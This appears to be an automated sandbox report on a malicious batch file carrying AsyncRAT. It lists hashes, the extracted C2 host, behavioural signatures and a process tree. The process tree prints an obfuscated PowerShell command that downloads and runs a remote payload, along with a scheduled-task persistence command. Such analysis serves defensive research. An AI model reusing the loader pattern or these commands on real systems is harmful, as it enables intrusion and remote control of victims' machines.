Analysis
- max time kernel: 174s
- max time network: 273s
- platform: windows10-2004_x64
- resource: win10v2004-20220901-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10/09/2022, 15:56
Static task: static1
Behavioral task: behavioral1
- Sample: TRACK-ORDER#114-85737.bat
- Resource: win7-20220812-en
General
- Target: TRACK-ORDER#114-85737.bat
- Size: 65KB
- MD5: 44d81d1aecc0e4b0aa0f9ad726a02e99
- SHA1: eebf5c17f72ee3a323619f45dd1db9d03a417c37
- SHA256: 4d634f419ee6d84324dccb8c2bbe3ed583220a676c92b1facf34bc749b4a9712
- SHA512: 6aff752752bdc92478e336c4e71e6d77ada065a76e255e84070834bcdcca52d296cc22d7f778d1dd1cc859b31716fb5a08325977cda550d2ab5da6d490121cb2
- SSDEEP: 192:nyj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj/:4
Malware Config
Extracted
- Family: asyncrat
- Version: 3LOSH RAT
- Botnet: Default
- C2: saedmad.linkpc.net:6666
- Mutex: AsyncMutex_6SI8OkPnk
- delay: 3
- install: false
- install_folder: %AppData%
Signatures
- Async RAT payload (2 IoCs)
  resource | yara_rule
  behavioral2/memory/4144-152-0x000000000040E12E-mapping.dmp | asyncrat
  behavioral2/memory/4144-151-0x0000000000400000-0x0000000000414000-memory.dmp | asyncrat
- Blocklisted process makes network request (1 IoC)
  flow | pid | Process
  5 | 2428 | powershell.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | WScript.exe
- Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 4128 set thread context of 4144 | 4128 | powershell.exe | 112
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  4524 | schtasks.exe
- Modifies registry class (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | powershell.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid | Process
  2428 | powershell.exe
  2428 | powershell.exe
  4128 | powershell.exe
  4128 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2428 | powershell.exe
  Token: SeDebugPrivilege | 4128 | powershell.exe
  Token: SeDebugPrivilege | 4144 | aspnet_compiler.exe
- Suspicious use of WriteProcessMemory (22 IoCs)
  description | pid | Process | procid_target
  PID 644 wrote to memory of 3992 | 644 | cmd.exe | 86
  PID 644 wrote to memory of 3992 | 644 | cmd.exe | 86
  PID 3992 wrote to memory of 2428 | 3992 | cmd.exe | 87
  PID 3992 wrote to memory of 2428 | 3992 | cmd.exe | 87
  PID 2428 wrote to memory of 5056 | 2428 | powershell.exe | 94
  PID 2428 wrote to memory of 5056 | 2428 | powershell.exe | 94
  PID 5056 wrote to memory of 2340 | 5056 | WScript.exe | 96
  PID 5056 wrote to memory of 2340 | 5056 | WScript.exe | 96
  PID 2340 wrote to memory of 4524 | 2340 | cmd.exe | 98
  PID 2340 wrote to memory of 4524 | 2340 | cmd.exe | 98
  PID 1796 wrote to memory of 3876 | 1796 | WScript.exe | 109
  PID 1796 wrote to memory of 3876 | 1796 | WScript.exe | 109
  PID 3876 wrote to memory of 4128 | 3876 | cmd.exe | 111
  PID 3876 wrote to memory of 4128 | 3876 | cmd.exe | 111
  PID 4128 wrote to memory of 4144 | 4128 | powershell.exe | 112
  PID 4128 wrote to memory of 4144 | 4128 | powershell.exe | 112
  PID 4128 wrote to memory of 4144 | 4128 | powershell.exe | 112
  PID 4128 wrote to memory of 4144 | 4128 | powershell.exe | 112
  PID 4128 wrote to memory of 4144 | 4128 | powershell.exe | 112
  PID 4128 wrote to memory of 4144 | 4128 | powershell.exe | 112
  PID 4128 wrote to memory of 4144 | 4128 | powershell.exe | 112
  PID 4128 wrote to memory of 4144 | 4128 | powershell.exe | 112
Processes
- Depth 1: C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TRACK-ORDER#114-85737.bat"
  - Suspicious use of WriteProcessMemory
  PID: 644
  - Depth 2: C:\Windows\system32\cmd.exe
    Command line: CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)
    - Suspicious use of WriteProcessMemory
    PID: 3992
    - Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)
      - Blocklisted process makes network request
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2428
      - Depth 4: C:\Windows\System32\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Not\xx.vbs"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        PID: 5056
        - Depth 5: C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Not\xx.bat" "
          - Suspicious use of WriteProcessMemory
          PID: 2340
          - Depth 6: C:\Windows\system32\schtasks.exe
            Command line: schtasks.exe /create /tn App /sc minute /mo 3 /tr "C:\ProgramData\Not\Bin.vbs"
            - Creates scheduled task(s)
            PID: 4524
- Depth 1: C:\Windows\System32\WScript.exe
  Command line: C:\Windows\System32\WScript.exe "C:\ProgramData\Not\Bin.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 1796
  - Depth 2: C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Not\Bin.bat" "
    - Suspicious use of WriteProcessMemory
    PID: 3876
    - Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Not\Bin.ps1
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4128
      - Depth 4: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        - Suspicious use of AdjustPrivilegeToken
        PID: 4144
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 83B
  MD5: 228c44b9cc0e8c86c51fddaf3294bcf8
  SHA1: 7e83a7e1e4f33a4a299554090de4563534629754
  SHA256: fce64aa23e5bc07ad08d364af38b3a3adc4effc0eaf72c90acf868b7be3fdf6a
  SHA512: bbb26d73fd47a926cf358ae5263fb246a93201b60d8650018e24b027e7e708b9afdb5a0aeaed7444736eb319721b2da4eca57e60e3e98643270e09e1d0b433d6
- Filesize: 345KB
  MD5: bb3e63b6d61561accb4026bcbd5a7afb
  SHA1: 21be5417c5fde2934f789fc9ca3fd0f55225f4a2
  SHA256: 56a539c6a9a2f57c81e3f873360f451c4c452f7bb3fad9353e9ce822fedaf1de
  SHA512: 50472f0848dec09a4184648072b731482100311e6b0f730002606cfdf4094e8b9f2bdc98f0a2fee085e479c05aa2c7d3eb99040c7c8c35737ffbc4e23fd2207c
- Filesize: 118B
  MD5: 9c7994acb861283eab4675bb06ba4159
  SHA1: f6e83e6d35dbcf9cd3a0d3677d7b676df79d1b30
  SHA256: e86197ddea92b4f651707713ffe7db2bb252786a6ae6196481433cc43e7a999c
  SHA512: a512e20e819941e0bf713e42cbbf0c5ddf541f0976f49f022e2c1227f7a414443703fc985e65f0ced33f4d9c6cbd58849b28d05eb4b676c6a087ea10a3a9ff26
- Filesize: 81B
  MD5: bed7fd2f5fc7183c0a509fc8f9d48ec9
  SHA1: 460dd3af5d3010be510b5593ba8740912c92fc85
  SHA256: 2f80e6b366b6a89a4e28234ab02f4bbc2232c899e5f1f167900567972c9589c2
  SHA512: 4c377cb0892eae4a003005f0b4bc081dd5f5a519cb662ab8dab9e2446d22a357a3774824e4c7d3613031a9a10dc061f79371c15510deabd21b8a80ff14f41445
- Filesize: 169B
  MD5: 192a7c188e6ede340bdb4d518a4ed036
  SHA1: 141a993b91c38b734579427b815df181a0ee3cb1
  SHA256: 5e8c30a0ac20a2cac5e482a59ccbf94d9ac470034a4ef6cba58740d5056b7466
  SHA512: 3b7d1d75f665604896751036966d296558e2e11151c0de83cc079dda069d8f560cd0f0bd623c08ab09a466fadbc0d91d8e577dc3c32613fc9e2c807a023e1f3e
- Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
- Filesize: 1KB
  MD5: 6b7ac01e198a7605eb839bc9d0f82892
  SHA1: 1745825f055a97a44a877ce22b772709bdfafe0a
  SHA256: bd6de323224adb57779eea57fe6817dea350d402161165a7a203540b5d98ee34
  SHA512: cfab4ce52e0634e216945d6d54bb1801c9cda03a4c6e01881f044218ccd1383daa962fc7f5d83a910fb6ee89dcb4cfd310db706394ea4b6dac8b1870f1755a14